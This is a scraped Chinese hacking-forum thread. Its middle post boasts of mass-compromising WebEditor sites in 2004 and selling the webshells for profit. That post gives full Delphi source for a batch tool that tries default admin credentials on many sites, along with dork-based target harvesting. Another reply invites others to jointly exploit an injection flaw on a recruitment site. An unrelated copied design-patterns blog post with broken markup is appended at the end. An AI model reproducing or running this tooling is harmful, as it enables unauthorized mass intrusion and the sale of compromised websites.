最近看过此主题的会员

返回列表 发帖

XXOO北京某电子集团

本帖最后由 無情 于 2011-6-14 17:23 编辑

没什么技术含量

   只发个图吧

   首先是我找工作,然后才然后的,呵呵(小小的满足一下哥的虚荣心)


附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

北京某安全公司招聘WEB安全工程师

唐骏回应“学历门”:虚荣心造成的

[HR]北京安码科技 信息安全工程师

求帮助,求xxoo!

互联网之父温顿·瑟夫11月6日将现身北京

北京航天飞行控制中心新设备防黑客

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

[attach]866[/attach]

TOP

啥时候发下网址    我也xxoo下去

TOP

你这么想XXOO

TOP

回复 3# h1ck5r


    结果工作也没结果了

  想XXOO,,就M我呀。

TOP

木鸡鸡啊木鸡鸡= =

TOP

话说找工作的时候 结果发现了智联招聘的一个伪静态注入点。。。有兴趣的M我一起搞搞。。。
Im BlackFeather

TOP

木有时间,木有网呀
  怎么搞呀,,
  哎,杯具呀,

TOP

回复 7# bakurise


    有时候一起看看··

TOP

看我怎么批量拿站赚钱。
好久以前的事了。只是一种方法。。当时2004年。。webeditor漏洞大爆发。。。批量拿shell 似乎成了拿站高手的代名词。小弟我也不甘寂寞。。down 了一份 webeditor 看了下源代码。。看了下
/admin_login.asp
发现只要向 admin_login.asp 发送GET action=login&usr=admin&pwd=admin888 然后判断返回数据是否包含“欢迎您使用本系统” 如果包含就证明帐号密码正确。。人懒那就写个程序吧。。。没办法小弟我就一个人。。让我自己一个一个测试这些漏洞。。。那何年能赚钱。。
以下为delphi 代码。。。经过测试非常漂亮滴 为我赚了几k 。。程序大概流程为
1.导入常用帐号密码 webeditor嘛。。就 帐号 admin 密码 admin or admin888
2.导入 url。进行批量。。
gethttp.pas----------------------------
unit Unit2;
interface
uses
  Classes,StdCtrls,Windows,SysUtils,wininet,IdHTTP;
var
  CS:TRTLCriticalSection;    //定义全局临界区
type
  T1 = class(TThread)
  private
    TmpM1,TmpM2,TmpM3: TMemo;
    TmpNum: integer;
    Str :string;
    procedure DataMemo;
  protected
    procedure Execute; override;
  public
    constructor Create(M1,M2,M3: TMemo; Num: integer);
  end;
function Get(URL: string): boolean;
function CheckUrl(url: string; TimeOut: integer = 5000): boolean;
implementation
uses Unit1;
{ T1 }
constructor T1.Create(M1,M2,M3: TMemo; Num: integer);
begin
  TmpNum := Num; // 传递参数
  TmpM1 :=M1;    // 绑定控件
  TmpM2 :=M2;
  TmpM3 :=M3;
  FreeOnTerminate := True; // 自动删除
  InitializeCriticalSection(CS); //初始化临界区
  inherited Create(False); // 直接运行
end;
function Get(URL: string): boolean;
var
  IDHTTP: TIDHttp;
  ss: String;
begin
  Result:= False;
  IDHTTP:= TIDHTTP.Create(nil);
  try
    try
      idhttp.HandleRedirects:= true;   //必须支持重定向否则可能出错
      idhttp.ReadTimeout:= 30000;      //超过这个时间则不再访问
      ss:= IDHTTP.Get(URL);
      if IDHTTP.ResponseCode=200 then
        Result :=true;
    except
    end;
  finally
    IDHTTP.Free;
  end;
end;
//====================== 判断网址是否存在的函数 =======================
function CheckUrl(url: string; TimeOut: integer = 5000): boolean;
var
  hSession, hfile, hRequest: hInternet;
  dwindex, dwcodelen: dword;
  dwcode: array[1..20] of char;
  res: pchar;
  re: integer;
  Err1: integer;
  j: integer;
begin
  if pos('http://', lowercase(url)) = 0 then
    url := 'http://' + url;
  Result := false;
  InternetSetOption(hSession, Internet_OPTION_CONNECT_TIMEOUT, @TimeOut, 4);
  hSession := InternetOpen('Mozilla/4.0', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
   //设置超时
  if assigned(hsession) then
  begin
    j := 1;
    while true do
    begin
      hfile := InternetOpenUrl(hsession, pchar(url), nil, 0, INTERNET_FLAG_RELOAD, 0);
   if hfile = nil then
      begin
        j := j + 1;
        Err1 := GetLastError;
        if j > 5 then break;
        if (Err1 <> 12002) or (Err1 <> 12152) then break;
        sleep(2);
      end
      else begin
        break;
      end;
    end;
    dwIndex := 0;
    dwCodeLen := 10;
    HttpQueryInfo(hfile, HTTP_QUERY_STATUS_CODE, @dwcode, dwcodeLen, dwIndex);
    res := pchar(@dwcode);
    re := strtointdef(res, 404);
    case re of
      400..450: result := false;
    else result := true;
    end;
    if assigned(hfile) then
      InternetCloseHandle(hfile);
      InternetCloseHandle(hsession);
    end;
end;
function GetBackSpaceCount(str:string):string;
var i,iCount:integer;
begin
   iCount :=50-length(str);
   for i:=0 to iCount-1 do
   begin
     Result :=Result+' ';
   end;
end;
procedure T1.DataMemo;
begin
  TmpM2.Lines.Add(str+GetBackSpaceCount(str)+'线程'+inttostr(TmpNum+1)+'检测结果');
  Form1.GroupBox2.Caption :='存在:共找到'+inttostr(TmpM2.Lines.Count)+'条路径';
end;
procedure T1.Execute;
begin
  Str :=trim(Form1.Edit1.Text) + TmpM1.Lines[TmpNum];
  EnterCriticalSection(cs);         //进入临界区
  if CheckUrl(Str) then
  begin
    Synchronize(DataMemo); // 同步
  end;
  LeaveCriticalSection(CS);      //退出临界区
  //sleep(20); // 线程挂起;
end;
end.
unit1.pas
unit Unit1;
interface
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, IdHTTP;
type
  TForm1 = class(TForm)
    Button1: TButton;
    ListBox1: TListBox;
    OpenDialog1: TOpenDialog;
    Button2: TButton;
    Button3: TButton;
    IdHTTP1: TIdHTTP;
    ListBox2: TListBox;
    Memo1: TMemo;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
    procedure Button3Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
var
  Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
name,path:string;
max,i:integer;
mylist:TStringlist;
begin
  if opendialog1.Execute then
     begin
     name := extractfilename(opendialog1.FileName);
     path := extractfiledir(opendialog1.FileName);
     path:= opendialog1.FileName;
     mylist:=TStringlist.Create;
     mylist.LoadFromFile(path);
     max:=mylist.Count;
     for i:=0 to max-1 do
        begin
           listbox1.Items.Add(mylist.Strings);
     end
  end
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
listbox1.Clear;
end;
function Gethttp(URL: string): string; //gethtml
var
  IDHTTP: TIDHttp;
begin
   IDHTTP:= TIDHTTP.Create(nil);
   try
      idhttp.HandleRedirects:= true;   //必须支持重定向否则可能出错
      idhttp.ReadTimeout:= 30000;      //超过这个时间则不再访问
      Gethttp:= IDHTTP.Get(URL);
     except
    end;
end;
procedure TForm1.Button3Click(Sender: TObject); //botton click
var
i:integer;
html:string;
pass:string;
pass1:string;
j:integer;
begin
   pass:='/admin_login.asp?action=login&amp;usr=admin&amp;pwd=';
  for i:=0 to listbox1.Count-1  do
     begin
      try
      for j:=0 to listbox2.Count-1 do
         begin
        pass1:=pass+listbox2.Items.Strings;
        html:= gethttp(listbox1.Items.Strings +pass1 );
        if pos(html,'欢迎您使用本系统')=0 then
        begin
                memo1.Text :=memo1.Text +listbox1.Items.Strings +chr(13)+chr(10);
        end
      end
       except
      end
     end
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
listbox2.Items.Add('admin');
listbox2.Items.Add('admin888');
end;
end.
然后下了个挖掘机1.0。。批量查找 inurl:editor/ 和 inurl:/webeditor/ 等。。
放到我写的程序里面批量一下。。。。用了几个时。。tmd几千个shell 的帐号密码就出来了。。。。 然后把 没有默认帐号密码的地址整理出来。。又写了个程序判断 数据库默认路径。恩。大概 60%没有修改。。又是几百shell。。。
当时卖shell 一个一块。。小赚了一比。。。
当时没写多线层的自己用嘛。所以当今社会。。。当你一个人的时候。。tmd 只有程序陪你黑站了。。。。只是个让人变懒的思路高手勿来。以后一段时间尝到了甜头。。写了。很多类似的程序。。都没有发布。。现在。。嘛。。如果有哪位兄弟想要。加我qq 吧。。。:283207388




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

模式应用(一) 攀升·Uranus BLOG
来源: http://www.cppblog.com/iuranus/archive/2007/12/10/38189.html
版权属于: 攀升·Uranus BLOG
关于这篇文章我一直想写,但每次总是没有一个闲下来的时间,现在试着挤每天的闲暇时间一点点完成。
         一直以来我都想做一个软件架构师,所以我在平时的开发中除了保证写出高质量的代码外,还会从架构者的角度来仔细推敲整个应用。当然了这个架构主要是指的代码的架构,那么推敲的依据主要来自三个地方:
1.GRASP
       每当遇到软件分层,类似于业务逻辑放在那个类哪个层等问题时,我通常都会参考GRASP,General Responsibility Assignment Software Pattern。包括以下几个原则:
       A.Information Expert 信息专家
       B.Creator 创建者
       C.Low Coupling 低耦合
       D.High Cohesion 高内聚
       E.Controller 控制器
       F.Polymorphism 多态
       G.Pure Fabrication 纯虚构
       H.Indirection 间接:避免对象间直接耦合,合理分配职责
       G.Protected Variations 受保护变化:开闭原则。
       虽说每个思想懂,但真正能用在实际开发中还是有一定难度的,具体的介绍可以参考大师CRAIG LARMAN的《UML与模式应用》。
2.Design Patterns
         古人练剑分三层境界。第一层是每个招式都熟记于心, 没事就拿出来练练,比武时按照自己的套路出剑,第二层就是没有招式,只有思想,假如想解掉别人的剑,那目标就是解剑,随便出剑都可以做到。第三层就是人剑合一,这种境界就已经不依赖与剑了,身边的任何物体包括自己都可以是一把剑,都可以置对方于死地。
         世间万物皆相通,我认为模式的学习也是有三种阶段,23种模式熟记于心,遇到具体项目套相对应的设计模式,虽然有点死板,但给软件的维护和扩展带来很大好处,这是学习设计模式的第一层。第二层就是大脑中已经没有具体的模式,只知道如果要解耦,那么就这样做,如果追求运行速度,就那样做,这就不一定是23种模式的一种了。如果已经有前两层的功力,那就要追求人设计模式合一,这时就有很多变化,创造模式,不会依赖与语言(C, C++, JAVA等等),各个领域的设计模式等等。估计Erich Gamma应该到了第三层境界了吧。
3. 我的前辈
         他们在这方面很有经验,架构这个东西就是平时要积累丰富项目经验,看看国外的一个个大牛,都不是40多岁的人,所以我就很讨厌某些言论说软件是吃青春饭的…
         在正常的情况,在我看来,现在的软件设计从大的角度来讲就是复用(Reuse),从小的角度来讲就是解耦(Decouple或者separate concern)。作为一名优秀的程序员,开发一个App,写一句代码都要考虑到你写的这个类与其它类的关系,是不是多余的依赖,适不适合扩展等等。由于这段时间工作的需要,我接连转了三个项目,目睹了每个项目架构的优缺点,加之前不久我又进行了IJC关于RUP的培训,与IJC的David和蒋胜老师深入的讨论了软件开发过程,所以我想把学到的一些设计方法举个例子来说明。
         在进入主题之前我想先叙述一些概念。
         概念1:由面向过程到面向对象绝对是一个质的飞跃,我认为OO最大的优点在于它的程序设计和现实世界是相对应的,从23种设计模式的名字上面也有体现。工厂,代理,适配器等等。
         概念2:MVC(Model-View-Controller,模型—视图—控制器模式)用于表示一种软件架构模式。它把软件系统分为三个基本部分:模型(英语:Model),视图(View)和控制(Controller)。视图(View)代表用户交互界面,控制(Controller)可以理解将模型与视图匹配在一起,共同完成用户的请求。模型主要是指业务流程的具体细节,整个过程如图1。那么其实在实际的开发中MVC还是有很多局限性的,后面会通过一个例子给出一个我的改进版。


[quote]

<P align=center>图1[/quote]
         概念3:RUP
         RUP(Rational Unified Process,统一软件开发过程,统一软件过程)是一个面向对象且基于网络的程序开发方法论。根据Rational(Rational Rose和统一建模语言的开发者)的说法,好像一个在线的指导者,它可以为所有方面和层次的程序开发提供指导方针,模版以及事例支持。 RUP和类似的产品--例如面向对象的软件过程(OOSP),以及OPEN Process都是理解性的软件工程工具--把开发中面向过程的方面(例如定义的阶段,技术和实践)和其他开发的组件(例如文档,模型,手册以及代码等等)整合在一个统一的框架内。
         抓其精髓就是使整个开发过程统一,可管理。用例驱动,以架构为中心,增量与迭代,是RUP的主要思想。RUP是一个很复杂的过程,但好在它在每个项目中使用时可以因地制宜,有效的裁减可以使RUP在工程中发挥最大的威力。作为一个程序员,我首先要关心的是有关代码架构的问题,RUP有一个核心的思想Separate concern,也就是分离关注点。这也刚好体现了面向对象的一个思想:解耦。那么RUP中最能体现它Separate concern的应该就算它的Minimal和Extension了,当然还有一些其它的体现方式,我会在下篇实例中详细介绍。

<P align=center>      简单来说Minimal指的是那些上不依赖于表现层,下不依赖于数据库,操作系统等,可以在任何环境下运行的纯业务逻辑程序,最主要的还是Minimal部分的代码可以复用。Extension包括Minimal,它依赖于某个特定的底层程序或者操作系统。Minimal和Extension类似于图2的关系。图2[/quote]


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表